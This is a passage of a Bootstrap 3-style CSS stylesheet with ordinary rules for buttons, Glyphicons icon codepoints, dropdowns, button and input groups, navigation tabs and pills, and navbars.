.btn-danger.active, .open .dropdown-toggle.btn-danger { background-image: none; } .btn-danger.disabled, .btn-danger[disabled], fieldset[disabled] .btn-danger, .btn-danger.disabled:hover, .btn-danger[disabled]:hover, fieldset[disabled] .btn-danger:hover, .btn-danger.disabled:focus, .btn-danger[disabled]:focus, fieldset[disabled] .btn-danger:focus, .btn-danger.disabled:active, .btn-danger[disabled]:active, fieldset[disabled] .btn-danger:active, .btn-danger.disabled.active, .btn-danger[disabled].active, fieldset[disabled] .btn-danger.active { background-color: #d9534f; border-color: #d43f3a; } .btn-danger .badge { color: #d9534f; background-color: #fff; } .btn-link { font-weight: normal; color: #428bca; cursor: pointer; border-radius: 0; } .btn-link, .btn-link:active, .btn-link[disabled], fieldset[disabled] .btn-link { background-color: transparent; -webkit-box-shadow: none; box-shadow: none; } .btn-link, .btn-link:hover, .btn-link:focus, .btn-link:active { border-color: transparent; } .btn-link:hover, .btn-link:focus { color: #2a6496; text-decoration: underline; background-color: transparent; } .btn-link[disabled]:hover, fieldset[disabled] .btn-link:hover, .btn-link[disabled]:focus, fieldset[disabled] .btn-link:focus { color: #999; text-decoration: none; } .btn-lg { padding: 10px 16px; font-size: 18px; line-height: 1.33; border-radius: 6px; } .btn-sm { padding: 5px 10px; font-size: 12px; line-height: 1.5; border-radius: 3px; } .btn-xs { padding: 1px 5px; font-size: 12px; line-height: 1.5; border-radius: 3px; } .btn-block { display: block; width: 100%; padding-right: 0; padding-left: 0; } .btn-block + .btn-block { margin-top: 5px; } input[type="submit"].btn-block, input[type="reset"].btn-block, input[type="button"].btn-block { width: 100%; } .fade { opacity: 0; -webkit-transition: opacity .15s linear; transition: opacity .15s linear; } .fade.in { opacity: 1; } .collapse { display: none; } .collapse.in { display: block; } .collapsing { position: relative; height: 0; overflow: hidden; -webkit-transition: height .35s ease; transition: height .35s ease; } @font-face { font-family: 'Glyphicons Halflings'; src: url('../fonts/glyphicons-halflings-regular.eot'); src: url('../fonts/glyphicons-halflings-regular.eot?#iefix') format('embedded-opentype'), url('../fonts/glyphicons-halflings-regular.woff') format('woff'), url('../fonts/glyphicons-halflings-regular.ttf') format('truetype'), url('../fonts/glyphicons-halflings-regular.svg#glyphicons_halflingsregular') format('svg'); } .glyphicon { position: relative; top: 1px; display: inline-block; font-family: 'Glyphicons Halflings'; font-style: normal; font-weight: normal; line-height: 1; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .glyphicon-asterisk:before { content: "\2a"; } .glyphicon-plus:before { content: "\2b"; } .glyphicon-euro:before { content: "\20ac"; } .glyphicon-minus:before { content: "\2212"; } .glyphicon-cloud:before { content: "\2601"; } .glyphicon-envelope:before { content: "\2709"; } .glyphicon-pencil:before { content: "\270f"; } .glyphicon-glass:before { content: "\e001"; } .glyphicon-music:before { content: "\e002"; } .glyphicon-search:before { content: "\e003"; } .glyphicon-heart:before { content: "\e005"; } .glyphicon-star:before { content: "\e006"; } .glyphicon-star-empty:before { content: "\e007"; } .glyphicon-user:before { content: "\e008"; } .glyphicon-film:before { content: "\e009"; } .glyphicon-th-large:before { content: "\e010"; } .glyphicon-th:before { content: "\e011"; } .glyphicon-th-list:before { content: "\e012"; } .glyphicon-ok:before { content: "\e013"; } .glyphicon-remove:before { content: "\e014"; } .glyphicon-zoom-in:before { content: "\e015"; } .glyphicon-zoom-out:before { content: "\e016"; } .glyphicon-off:before { content: "\e017"; } .glyphicon-signal:before { content: "\e018"; } .glyphicon-cog:before { content: "\e019"; } .glyphicon-trash:before { content: "\e020"; } .glyphicon-home:before { content: "\e021"; } .glyphicon-file:before { content: "\e022"; } .glyphicon-time:before { content: "\e023"; } .glyphicon-road:before { content: "\e024"; } .glyphicon-download-alt:before { content: "\e025"; } .glyphicon-download:before { content: "\e026"; } .glyphicon-upload:before { content: "\e027"; } .glyphicon-inbox:before { content: "\e028"; } .glyphicon-play-circle:before { content: "\e029"; } .glyphicon-repeat:before { content: "\e030"; } .glyphicon-refresh:before { content: "\e031"; } .glyphicon-list-alt:before { content: "\e032"; } .glyphicon-lock:before { content: "\e033"; } .glyphicon-flag:before { content: "\e034"; } .glyphicon-headphones:before { content: "\e035"; } .glyphicon-volume-off:before { content: "\e036"; } .glyphicon-volume-down:before { content: "\e037"; } .glyphicon-volume-up:before { content: "\e038"; } .glyphicon-qrcode:before { content: "\e039"; } .glyphicon-barcode:before { content: "\e040"; } .glyphicon-tag:before { content: "\e041"; } .glyphicon-tags:before { content: "\e042"; } .glyphicon-book:before { content: "\e043"; } .glyphicon-bookmark:before { content: "\e044"; } .glyphicon-print:before { content: "\e045"; } .glyphicon-camera:before { content: "\e046"; } .glyphicon-font:before { content: "\e047"; } .glyphicon-bold:before { content: "\e048"; } .glyphicon-italic:before { content: "\e049"; } .glyphicon-text-height:before { content: "\e050"; } .glyphicon-text-width:before { content: "\e051"; } .glyphicon-align-left:before { content: "\e052"; } .glyphicon-align-center:before { content: "\e053"; } .glyphicon-align-right:before { content: "\e054"; } .glyphicon-align-justify:before { content: "\e055"; } .glyphicon-list:before { content: "\e056"; } .glyphicon-indent-left:before { content: "\e057"; } .glyphicon-indent-right:before { content: "\e058"; } .glyphicon-facetime-video:before { content: "\e059"; } .glyphicon-picture:before { content: "\e060"; } .glyphicon-map-marker:before { content: "\e062"; } .glyphicon-adjust:before { content: "\e063"; } .glyphicon-tint:before { content: "\e064"; } .glyphicon-edit:before { content: "\e065"; } .glyphicon-share:before { content: "\e066"; } .glyphicon-check:before { content: "\e067"; } .glyphicon-move:before { content: "\e068"; } .glyphicon-step-backward:before { content: "\e069"; } .glyphicon-fast-backward:before { content: "\e070"; } .glyphicon-backward:before { content: "\e071"; } .glyphicon-play:before { content: "\e072"; } .glyphicon-pause:before { content: "\e073"; } .glyphicon-stop:before { content: "\e074"; } .glyphicon-forward:before { content: "\e075"; } .glyphicon-fast-forward:before { content: "\e076"; } .glyphicon-step-forward:before { content: "\e077"; } .glyphicon-eject:before { content: "\e078"; } .glyphicon-chevron-left:before { content: "\e079"; } .glyphicon-chevron-right:before { content: "\e080"; } .glyphicon-plus-sign:before { content: "\e081"; } .glyphicon-minus-sign:before { content: "\e082"; } .glyphicon-remove-sign:before { content: "\e083"; } .glyphicon-ok-sign:before { content: "\e084"; } .glyphicon-question-sign:before { content: "\e085"; } .glyphicon-info-sign:before { content: "\e086"; } .glyphicon-screenshot:before { content: "\e087"; } .glyphicon-remove-circle:before { content: "\e088"; } .glyphicon-ok-circle:before { content: "\e089"; } .glyphicon-ban-circle:before { content: "\e090"; } .glyphicon-arrow-left:before { content: "\e091"; } .glyphicon-arrow-right:before { content: "\e092"; } .glyphicon-arrow-up:before { content: "\e093"; } .glyphicon-arrow-down:before { content: "\e094"; } .glyphicon-share-alt:before { content: "\e095"; } .glyphicon-resize-full:before { content: "\e096"; } .glyphicon-resize-small:before { content: "\e097"; } .glyphicon-exclamation-sign:before { content: "\e101"; } .glyphicon-gift:before { content: "\e102"; } .glyphicon-leaf:before { content: "\e103"; } .glyphicon-fire:before { content: "\e104"; } .glyphicon-eye-open:before { content: "\e105"; } .glyphicon-eye-close:before { content: "\e106"; } .glyphicon-warning-sign:before { content: "\e107"; } .glyphicon-plane:before { content: "\e108"; } .glyphicon-calendar:before { content: "\e109"; } .glyphicon-random:before { content: "\e110"; } .glyphicon-comment:before { content: "\e111"; } .glyphicon-magnet:before { content: "\e112"; } .glyphicon-chevron-up:before { content: "\e113"; } .glyphicon-chevron-down:before { content: "\e114"; } .glyphicon-retweet:before { content: "\e115"; } .glyphicon-shopping-cart:before { content: "\e116"; } .glyphicon-folder-close:before { content: "\e117"; } .glyphicon-folder-open:before { content: "\e118"; } .glyphicon-resize-vertical:before { content: "\e119"; } .glyphicon-resize-horizontal:before { content: "\e120"; } .glyphicon-hdd:before { content: "\e121"; } .glyphicon-bullhorn:before { content: "\e122"; } .glyphicon-bell:before { content: "\e123"; } .glyphicon-certificate:before { content: "\e124"; } .glyphicon-thumbs-up:before { content: "\e125"; } .glyphicon-thumbs-down:before { content: "\e126"; } .glyphicon-hand-right:before { content: "\e127"; } .glyphicon-hand-left:before { content: "\e128"; } .glyphicon-hand-up:before { content: "\e129"; } .glyphicon-hand-down:before { content: "\e130"; } .glyphicon-circle-arrow-right:before { content: "\e131"; } .glyphicon-circle-arrow-left:before { content: "\e132"; } .glyphicon-circle-arrow-up:before { content: "\e133"; } .glyphicon-circle-arrow-down:before { content: "\e134"; } .glyphicon-globe:before { content: "\e135"; } .glyphicon-wrench:before { content: "\e136"; } .glyphicon-tasks:before { content: "\e137"; } .glyphicon-filter:before { content: "\e138"; } .glyphicon-briefcase:before { content: "\e139"; } .glyphicon-fullscreen:before { content: "\e140"; } .glyphicon-dashboard:before { content: "\e141"; } .glyphicon-paperclip:before { content: "\e142"; } .glyphicon-heart-empty:before { content: "\e143"; } .glyphicon-link:before { content: "\e144"; } .glyphicon-phone:before { content: "\e145"; } .glyphicon-pushpin:before { content: "\e146"; } .glyphicon-usd:before { content: "\e148"; } .glyphicon-gbp:before { content: "\e149"; } .glyphicon-sort:before { content: "\e150"; } .glyphicon-sort-by-alphabet:before { content: "\e151"; } .glyphicon-sort-by-alphabet-alt:before { content: "\e152"; } .glyphicon-sort-by-order:before { content: "\e153"; } .glyphicon-sort-by-order-alt:before { content: "\e154"; } .glyphicon-sort-by-attributes:before { content: "\e155"; } .glyphicon-sort-by-attributes-alt:before { content: "\e156"; } .glyphicon-unchecked:before { content: "\e157"; } .glyphicon-expand:before { content: "\e158"; } .glyphicon-collapse-down:before { content: "\e159"; } .glyphicon-collapse-up:before { content: "\e160"; } .glyphicon-log-in:before { content: "\e161"; } .glyphicon-flash:before { content: "\e162"; } .glyphicon-log-out:before { content: "\e163"; } .glyphicon-new-window:before { content: "\e164"; } .glyphicon-record:before { content: "\e165"; } .glyphicon-save:before { content: "\e166"; } .glyphicon-open:before { content: "\e167"; } .glyphicon-saved:before { content: "\e168"; } .glyphicon-import:before { content: "\e169"; } .glyphicon-export:before { content: "\e170"; } .glyphicon-send:before { content: "\e171"; } .glyphicon-floppy-disk:before { content: "\e172"; } .glyphicon-floppy-saved:before { content: "\e173"; } .glyphicon-floppy-remove:before { content: "\e174"; } .glyphicon-floppy-save:before { content: "\e175"; } .glyphicon-floppy-open:before { content: "\e176"; } .glyphicon-credit-card:before { content: "\e177"; } .glyphicon-transfer:before { content: "\e178"; } .glyphicon-cutlery:before { content: "\e179"; } .glyphicon-header:before { content: "\e180"; } .glyphicon-compressed:before { content: "\e181"; } .glyphicon-earphone:before { content: "\e182"; } .glyphicon-phone-alt:before { content: "\e183"; } .glyphicon-tower:before { content: "\e184"; } .glyphicon-stats:before { content: "\e185"; } .glyphicon-sd-video:before { content: "\e186"; } .glyphicon-hd-video:before { content: "\e187"; } .glyphicon-subtitles:before { content: "\e188"; } .glyphicon-sound-stereo:before { content: "\e189"; } .glyphicon-sound-dolby:before { content: "\e190"; } .glyphicon-sound-5-1:before { content: "\e191"; } .glyphicon-sound-6-1:before { content: "\e192"; } .glyphicon-sound-7-1:before { content: "\e193"; } .glyphicon-copyright-mark:before { content: "\e194"; } .glyphicon-registration-mark:before { content: "\e195"; } .glyphicon-cloud-download:before { content: "\e197"; } .glyphicon-cloud-upload:before { content: "\e198"; } .glyphicon-tree-conifer:before { content: "\e199"; } .glyphicon-tree-deciduous:before { content: "\e200"; } .caret { display: inline-block; width: 0; height: 0; margin-left: 2px; vertical-align: middle; border-top: 4px solid; border-right: 4px solid transparent; border-left: 4px solid transparent; } .dropdown { position: relative; } .dropdown-toggle:focus { outline: 0; } .dropdown-menu { position: absolute; top: 100%; left: 0; z-index: 1000; display: none; float: left; min-width: 160px; padding: 5px 0; margin: 2px 0 0; font-size: 14px; list-style: none; background-color: #fff; background-clip: padding-box; border: 1px solid #ccc; border: 1px solid rgba(0, 0, 0, .15); border-radius: 4px; -webkit-box-shadow: 0 6px 12px rgba(0, 0, 0, .175); box-shadow: 0 6px 12px rgba(0, 0, 0, .175); } .dropdown-menu.pull-right { right: 0; left: auto; } .dropdown-menu .divider { height: 1px; margin: 9px 0; overflow: hidden; background-color: #e5e5e5; } .dropdown-menu > li > a { display: block; padding: 3px 20px; clear: both; font-weight: normal; line-height: 1.428571429; color: #333; white-space: nowrap; } .dropdown-menu > li > a:hover, .dropdown-menu > li > a:focus { color: #262626; text-decoration: none; background-color: #f5f5f5; } .dropdown-menu > .active > a, .dropdown-menu > .active > a:hover, .dropdown-menu > .active > a:focus { color: #fff; text-decoration: none; background-color: #428bca; outline: 0; } .dropdown-menu > .disabled > a, .dropdown-menu > .disabled > a:hover, .dropdown-menu > .disabled > a:focus { color: #999; } .dropdown-menu > .disabled > a:hover, .dropdown-menu > .disabled > a:focus { text-decoration: none; cursor: not-allowed; background-color: transparent; background-image: none; filter: progid:DXImageTransform.Microsoft.gradient(enabled = false); } .open > .dropdown-menu { display: block; } .open > a { outline: 0; } .dropdown-menu-right { right: 0; left: auto; } .dropdown-menu-left { right: auto; left: 0; } .dropdown-header { display: block; padding: 3px 20px; font-size: 12px; line-height: 1.428571429; color: #999; } .dropdown-backdrop { position: fixed; top: 0; right: 0; bottom: 0; left: 0; z-index: 990; } .pull-right > .dropdown-menu { right: 0; left: auto; } .dropup .caret, .navbar-fixed-bottom .dropdown .caret { content: ""; border-top: 0; border-bottom: 4px solid; } .dropup .dropdown-menu, .navbar-fixed-bottom .dropdown .dropdown-menu { top: auto; bottom: 100%; margin-bottom: 1px; } @media (min-width: 768px) { .navbar-right .dropdown-menu { right: 0; left: auto; } .navbar-right .dropdown-menu-left { right: auto; left: 0; } } .btn-group, .btn-group-vertical { position: relative; display: inline-block; vertical-align: middle; } .btn-group > .btn, .btn-group-vertical > .btn { position: relative; float: left; } .btn-group > .btn:hover, .btn-group-vertical > .btn:hover, .btn-group > .btn:focus, .btn-group-vertical > .btn:focus, .btn-group > .btn:active, .btn-group-vertical > .btn:active, .btn-group > .btn.active, .btn-group-vertical > .btn.active { z-index: 2; } .btn-group > .btn:focus, .btn-group-vertical > .btn:focus { outline: none; } .btn-group .btn + .btn, .btn-group .btn + .btn-group, .btn-group .btn-group + .btn, .btn-group .btn-group + .btn-group { margin-left: -1px; } .btn-toolbar { margin-left: -5px; } .btn-toolbar .btn-group, .btn-toolbar .input-group { float: left; } .btn-toolbar > .btn, .btn-toolbar > .btn-group, .btn-toolbar > .input-group { margin-left: 5px; } .btn-group > .btn:not(:first-child):not(:last-child):not(.dropdown-toggle) { border-radius: 0; } .btn-group > .btn:first-child { margin-left: 0; } .btn-group > .btn:first-child:not(:last-child):not(.dropdown-toggle) { border-top-right-radius: 0; border-bottom-right-radius: 0; } .btn-group > .btn:last-child:not(:first-child), .btn-group > .dropdown-toggle:not(:first-child) { border-top-left-radius: 0; border-bottom-left-radius: 0; } .btn-group > .btn-group { float: left; } .btn-group > .btn-group:not(:first-child):not(:last-child) > .btn { border-radius: 0; } .btn-group > .btn-group:first-child > .btn:last-child, .btn-group > .btn-group:first-child > .dropdown-toggle { border-top-right-radius: 0; border-bottom-right-radius: 0; } .btn-group > .btn-group:last-child > .btn:first-child { border-top-left-radius: 0; border-bottom-left-radius: 0; } .btn-group .dropdown-toggle:active, .btn-group.open .dropdown-toggle { outline: 0; } .btn-group-xs > .btn { padding: 1px 5px; font-size: 12px; line-height: 1.5; border-radius: 3px; } .btn-group-sm > .btn { padding: 5px 10px; font-size: 12px; line-height: 1.5; border-radius: 3px; } .btn-group-lg > .btn { padding: 10px 16px; font-size: 18px; line-height: 1.33; border-radius: 6px; } .btn-group > .btn + .dropdown-toggle { padding-right: 8px; padding-left: 8px; } .btn-group > .btn-lg + .dropdown-toggle { padding-right: 12px; padding-left: 12px; } .btn-group.open .dropdown-toggle { -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, .125); box-shadow: inset 0 3px 5px rgba(0, 0, 0, .125); } .btn-group.open .dropdown-toggle.btn-link { -webkit-box-shadow: none; box-shadow: none; } .btn .caret { margin-left: 0; } .btn-lg .caret { border-width: 5px 5px 0; border-bottom-width: 0; } .dropup .btn-lg .caret { border-width: 0 5px 5px; } .btn-group-vertical > .btn, .btn-group-vertical > .btn-group, .btn-group-vertical > .btn-group > .btn { display: block; float: none; width: 100%; max-width: 100%; } .btn-group-vertical > .btn-group > .btn { float: none; } .btn-group-vertical > .btn + .btn, .btn-group-vertical > .btn + .btn-group, .btn-group-vertical > .btn-group + .btn, .btn-group-vertical > .btn-group + .btn-group { margin-top: -1px; margin-left: 0; } .btn-group-vertical > .btn:not(:first-child):not(:last-child) { border-radius: 0; } .btn-group-vertical > .btn:first-child:not(:last-child) { border-top-right-radius: 4px; border-bottom-right-radius: 0; border-bottom-left-radius: 0; } .btn-group-vertical > .btn:last-child:not(:first-child) { border-top-left-radius: 0; border-top-right-radius: 0; border-bottom-left-radius: 4px; } .btn-group-vertical > .btn-group:not(:first-child):not(:last-child) > .btn { border-radius: 0; } .btn-group-vertical > .btn-group:first-child:not(:last-child) > .btn:last-child, .btn-group-vertical > .btn-group:first-child:not(:last-child) > .dropdown-toggle { border-bottom-right-radius: 0; border-bottom-left-radius: 0; } .btn-group-vertical > .btn-group:last-child:not(:first-child) > .btn:first-child { border-top-left-radius: 0; border-top-right-radius: 0; } .btn-group-justified { display: table; width: 100%; table-layout: fixed; border-collapse: separate; } .btn-group-justified > .btn, .btn-group-justified > .btn-group { display: table-cell; float: none; width: 1%; } .btn-group-justified > .btn-group .btn { width: 100%; } [data-toggle="buttons"] > .btn > input[type="radio"], [data-toggle="buttons"] > .btn > input[type="checkbox"] { display: none; } .input-group { position: relative; display: table; border-collapse: separate; } .input-group[class*="col-"] { float: none; padding-right: 0; padding-left: 0; } .input-group .form-control { float: left; width: 100%; margin-bottom: 0; } .input-group-lg > .form-control, .input-group-lg > .input-group-addon, .input-group-lg > .input-group-btn > .btn { height: 46px; padding: 10px 16px; font-size: 18px; line-height: 1.33; border-radius: 6px; } select.input-group-lg > .form-control, select.input-group-lg > .input-group-addon, select.input-group-lg > .input-group-btn > .btn { height: 46px; line-height: 46px; } textarea.input-group-lg > .form-control, textarea.input-group-lg > .input-group-addon, textarea.input-group-lg > .input-group-btn > .btn, select[multiple].input-group-lg > .form-control, select[multiple].input-group-lg > .input-group-addon, select[multiple].input-group-lg > .input-group-btn > .btn { height: auto; } .input-group-sm > .form-control, .input-group-sm > .input-group-addon, .input-group-sm > .input-group-btn > .btn { height: 30px; padding: 5px 10px; font-size: 12px; line-height: 1.5; border-radius: 3px; } select.input-group-sm > .form-control, select.input-group-sm > .input-group-addon, select.input-group-sm > .input-group-btn > .btn { height: 30px; line-height: 30px; } textarea.input-group-sm > .form-control, textarea.input-group-sm > .input-group-addon, textarea.input-group-sm > .input-group-btn > .btn, select[multiple].input-group-sm > .form-control, select[multiple].input-group-sm > .input-group-addon, select[multiple].input-group-sm > .input-group-btn > .btn { height: auto; } .input-group-addon, .input-group-btn, .input-group .form-control { display: table-cell; } .input-group-addon:not(:first-child):not(:last-child), .input-group-btn:not(:first-child):not(:last-child), .input-group .form-control:not(:first-child):not(:last-child) { border-radius: 0; } .input-group-addon, .input-group-btn { width: 1%; white-space: nowrap; vertical-align: middle; } .input-group-addon { padding: 6px 12px; font-size: 14px; font-weight: normal; line-height: 1; color: #555; text-align: center; background-color: #eee; border: 1px solid #ccc; border-radius: 4px; } .input-group-addon.input-sm { padding: 5px 10px; font-size: 12px; border-radius: 3px; } .input-group-addon.input-lg { padding: 10px 16px; font-size: 18px; border-radius: 6px; } .input-group-addon input[type="radio"], .input-group-addon input[type="checkbox"] { margin-top: 0; } .input-group .form-control:first-child, .input-group-addon:first-child, .input-group-btn:first-child > .btn, .input-group-btn:first-child > .btn-group > .btn, .input-group-btn:first-child > .dropdown-toggle, .input-group-btn:last-child > .btn:not(:last-child):not(.dropdown-toggle), .input-group-btn:last-child > .btn-group:not(:last-child) > .btn { border-top-right-radius: 0; border-bottom-right-radius: 0; } .input-group-addon:first-child { border-right: 0; } .input-group .form-control:last-child, .input-group-addon:last-child, .input-group-btn:last-child > .btn, .input-group-btn:last-child > .btn-group > .btn, .input-group-btn:last-child > .dropdown-toggle, .input-group-btn:first-child > .btn:not(:first-child), .input-group-btn:first-child > .btn-group:not(:first-child) > .btn { border-top-left-radius: 0; border-bottom-left-radius: 0; } .input-group-addon:last-child { border-left: 0; } .input-group-btn { position: relative; font-size: 0; white-space: nowrap; } .input-group-btn > .btn { position: relative; } .input-group-btn > .btn + .btn { margin-left: -1px; } .input-group-btn > .btn:hover, .input-group-btn > .btn:focus, .input-group-btn > .btn:active { z-index: 2; } .input-group-btn:first-child > .btn, .input-group-btn:first-child > .btn-group { margin-right: -1px; } .input-group-btn:last-child > .btn, .input-group-btn:last-child > .btn-group { margin-left: -1px; } .nav { padding-left: 0; margin-bottom: 0; list-style: none; } .nav > li { position: relative; display: block; } .nav > li > a { position: relative; display: block; padding: 10px 15px; } /*.nav > li > a:hover, .nav > li > a:focus { text-decoration: none; background-color: #eee; }*/ .nav > li.disabled > a { color: #999; } .nav > li.disabled > a:hover, .nav > li.disabled > a:focus { color: #999; text-decoration: none; cursor: not-allowed; background-color: transparent; } .nav .open > a, .nav .open > a:hover, .nav .open > a:focus { background-color: #eee; border-color: #428bca; } .nav .nav-divider { height: 1px; margin: 9px 0; overflow: hidden; background-color: #e5e5e5; } .nav > li > a > img { max-width: none; } .nav-tabs { border-bottom: 1px solid #ddd; } .nav-tabs > li { float: left; margin-bottom: -1px; } .nav-tabs > li > a { margin-right: 2px; line-height: 1.428571429; border: 1px solid transparent; border-radius: 4px 4px 0 0; } .nav-tabs > li > a:hover { border-color: #eee #eee #ddd; } .nav-tabs > li.active > a, .nav-tabs > li.active > a:hover, .nav-tabs > li.active > a:focus { color: #555; cursor: default; background-color: #fff; border: 1px solid #ddd; border-bottom-color: transparent; } .nav-tabs.nav-justified { width: 100%; border-bottom: 0; } .nav-tabs.nav-justified > li { float: none; } .nav-tabs.nav-justified > li > a { margin-bottom: 5px; text-align: center; } .nav-tabs.nav-justified > .dropdown .dropdown-menu { top: auto; left: auto; } @media (min-width: 768px) { .nav-tabs.nav-justified > li { display: table-cell; width: 1%; } .nav-tabs.nav-justified > li > a { margin-bottom: 0; } } .nav-tabs.nav-justified > li > a { margin-right: 0; border-radius: 4px; } .nav-tabs.nav-justified > .active > a, .nav-tabs.nav-justified > .active > a:hover, .nav-tabs.nav-justified > .active > a:focus { border: 1px solid #ddd; } @media (min-width: 768px) { .nav-tabs.nav-justified > li > a { border-bottom: 1px solid #ddd; border-radius: 4px 4px 0 0; } .nav-tabs.nav-justified > .active > a, .nav-tabs.nav-justified > .active > a:hover, .nav-tabs.nav-justified > .active > a:focus { border-bottom-color: #fff; } } .nav-pills > li { float: left; } .nav-pills > li > a { border-radius: 4px; } .nav-pills > li + li { margin-left: 2px; } .nav-pills > li.active > a, .nav-pills > li.active > a:hover, .nav-pills > li.active > a:focus { color: #fff; background-color: #428bca; } .nav-stacked > li { float: none; } .nav-stacked > li + li { margin-top: 2px; margin-left: 0; } .nav-justified { width: 100%; } .nav-justified > li { float: none; } .nav-justified > li > a { margin-bottom: 5px; text-align: center; } .nav-justified > .dropdown .dropdown-menu { top: auto; left: auto; } @media (min-width: 768px) { .nav-justified > li { display: table-cell; width: 1%; } .nav-justified > li > a { margin-bottom: 0; } } .nav-tabs-justified { border-bottom: 0; } .nav-tabs-justified > li > a { margin-right: 0; border-radius: 4px; } .nav-tabs-justified > .active > a, .nav-tabs-justified > .active > a:hover, .nav-tabs-justified > .active > a:focus { border: 1px solid #ddd; } @media (min-width: 768px) { .nav-tabs-justified > li > a { border-bottom: 1px solid #ddd; border-radius: 4px 4px 0 0; } .nav-tabs-justified > .active > a, .nav-tabs-justified > .active > a:hover, .nav-tabs-justified > .active > a:focus { border-bottom-color: #fff; } } .tab-content > .tab-pane { display: none; } .tab-content > .active { display: block; } .nav-tabs .dropdown-menu { margin-top: -1px; border-top-left-radius: 0; border-top-right-radius: 0; } .navbar { position: relative; min-height: 50px; margin-bottom: 20px; border: 1px solid transparent; } @media (min-width: 768px) { .navbar { border-radius: 4px; } } @media (min-width: 768px) { .navbar-header { float: left; } } .navbar-collapse { max-height: 340px; padding-right: 15px; padding-left: 15px; overflow-x: visible; -webkit-overflow-scrolling: touch; border-top: 1px solid transparent; box-shadow: inset 0 1px 0 rgba(255, 255, 255, .1); } .navbar-collapse.in { overflow-y: auto; } @media (min-width: 768px) { .navbar-collapse { width: auto; border-top: 0; box-shadow: none; } .navbar-collapse.collapse { display: block !important; height: auto !important; padding-bottom: 0; overflow: visible !important; } .navbar-collapse.in { overflow-y: visible; } .navbar-fixed-top .navbar-collapse, .navbar-static-top .navbar-collapse, .navbar-fixed-bottom .navbar-collapse { padding-right: 0; padding-left: 0; } } .container > .navbar-header, .container-fluid > .navbar-header, .container > .navbar-collapse, .container-fluid > .navbar-collapse { margin-right: -15px; margin-left: -15px; } @media (min-width: 768px) { .container > .navbar-header, .container-fluid > .navbar-header, .container > .navbar-collapse, .container-fluid > .navbar-collapse { margin-right: 0; margin-left: 0; } } .navbar-static-top { z-index: 1000; border-width: 0 0 1px; } @media (min-width: 768px) { .navbar-static-top { border-radius: 0; } } .navbar-fixed-top, .navbar-fixed-bottom { position: fixed; right: 0; left: 0; z-index: 1030; } @media (min-width: 768px) { .navbar-fixed-top, .navbar-fixed-bottom { border-radius: 0; } } .navbar-fixed-top { top: 0; border-width: 0 0 1px; } .navbar-fixed-bottom { bottom: 0; margin-bottom: 0; border-width: 1px 0 0; } .navbar-brand { float: left; height: 20px; padding: 15px 15px; font-size: 18px; line-height: 20px; } .navbar-brand:hover, .navbar-brand:focus { text-decoration: none; } @media (min-width: 768px) { .navbar > .container .navbar-brand, .navbar > .container-fluid .navbar-brand { margin-left: -15px; } } .navbar-toggle { position: relative; float: right; padding: 9px 10px; margin-top: 8px; margin-right: 15px; margin-bottom: 8px; background-color: transparent; background-image: none; border: 1px solid transparent; border-radius: 4px; } .navbar-toggle:focus { outline: none; } .navbar-toggle .icon-bar { display: block; width: 22px; height: 2px; border-radius: 1px; } .navbar-toggle .icon-bar + .icon-bar { margin-top: 4px; } @media (min-width: 768px) { .navbar-toggle { display: none; } } .navbar-nav { margin: 7.5px -15px; } .navbar-nav > li > a { padding-top: 10px; padding-bottom: 10px; line-height: 20px; } @media (max-width: 767px) { .navbar-nav .open .dropdown-menu { position: static; float: none; width: auto; margin-top: 0; background-color: transparent; border: 0; box-shadow: none; } .navbar-nav .open .dropdown-menu > li > a, .navbar-nav .open .dropdown-menu .dropdown-header { padding: 5px 15px 5px 25px; } .navbar-nav .open .dropdown-menu > li > a { line-height: 20px; } .navbar-nav .open .dropdown-menu > li > a:hover, .navbar-nav .open .dropdown-menu > li > a:focus { background-image: none; } } @media (min-width: 768px) { .navbar-nav { float: left; margin: 0; } .navbar-nav > li { float: left; } .navbar-nav > li > a { padding-top: 15px; padding-bottom: 15px; } .navbar-nav.navbar-right:last-child { margin-right: -15px; } } @media (min-width: 768px) { .navbar-left { float: left !important; } .navbar-right { float: right !important; } } .navbar-form { padding: 10px 15px; margin-top: 8px; margin-right: -15px; margin-bottom: 8px; margin-left: -15px; border-top: 1px solid transparent; border-bottom: 1px solid transparent; -webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, .1), 0 1px 0 rgba(255, 255, 255, .1); box-shadow: inset 0 1px 0 rgba(255, 255, 255, .1), 0 1px 0 rgba(255, 255, 255, .1); } @media (min-width: 768px) { .navbar-form .form-group { display: inline-block; margin-bottom: 0; vertical-align: middle; } .navbar-form .form-control { display: inline-block; width: auto; vertical-align: middle; } .navbar-form .control-label { margin-bottom: 0; vertical-align: middle; } .navbar-form .radio, .navbar-form .checkbox { display: inline-block; padding-left: 0; margin-top: 0; margin-bottom: 0; vertical-align: middle; } .navbar-form .radio input[type="radio"], .navbar-form .checkbox input[type="checkbox"] { float: none; margin-left: 0; } .navbar-form .has-feedback .form-control-feedback { top: 0; } } @media (max-width: 767px) { .navbar-form .form-group { margin-bottom: 5px; } } @media (min-width: 768px) { .navbar-form { width: auto; padding-top: 0; padding-bottom: 0; margin-right: 0; margin-left: 0; border: 0; -webkit-box-shadow: none; box-shadow: none; } .navbar-form.navbar-right:last-child { margin-right: -15px; } } .navbar-nav > li > .dropdown-menu { margin-top: 0; border-top-left-radius: 0; border-top-right-radius: 0; } .navbar-fixed-bottom .navbar-nav > li > .dropdown-menu { border-bottom-right-radius: 0; border-bottom-left-radius: 0; } .navbar-btn { margin-top: 8px; margin-bottom: 8px; } .navbar-btn.btn-sm { margin-top: 10px; margin-bottom: 10px; } .navbar-btn.btn-xs { margin-top: 14px; margin-bottom: 14px; } .navbar-text { margin-top: 15px; margin-bottom: 15px; } @media (min-width: 768px) { .navbar-text { float: left; margin-right: 15px; margin-left: 15px; } .navbar-text.navbar-right:last-child { margin-right: 0; } } .navbar-default { background-color: #f8f8f8; border-color: #e7e7e7; } .navbar-default .navbar-brand { color: #777; } .navbar-default .navbar-brand:hover, .navbar-default .navbar-brand:focus { color: #5e5e5e; background-color: transparent; } .navbar-default .navbar-text { color: #777; } .navbar-default .navbar-nav > li > a { color: #777; } .navbar-default .navbar-nav > li > a:hover, .navbar-default .navbar-nav > li > a:focus { color: #333; background-color: transparent; } /*.navbar-default .navbar-nav > .active > a, .navbar-default .navbar-nav > .active > a:hover, .navbar-default .navbar-nav > .active > a:focus { color: #555; background-color: #e7e7e7; } .navbar-default .navbar-nav > .disabled > a, .navbar-default .navbar-nav > .disabled > a:hover, .navbar-default .navbar-nav > .disabled > a:focus { color: #ccc; background-color: transparent; }*/ 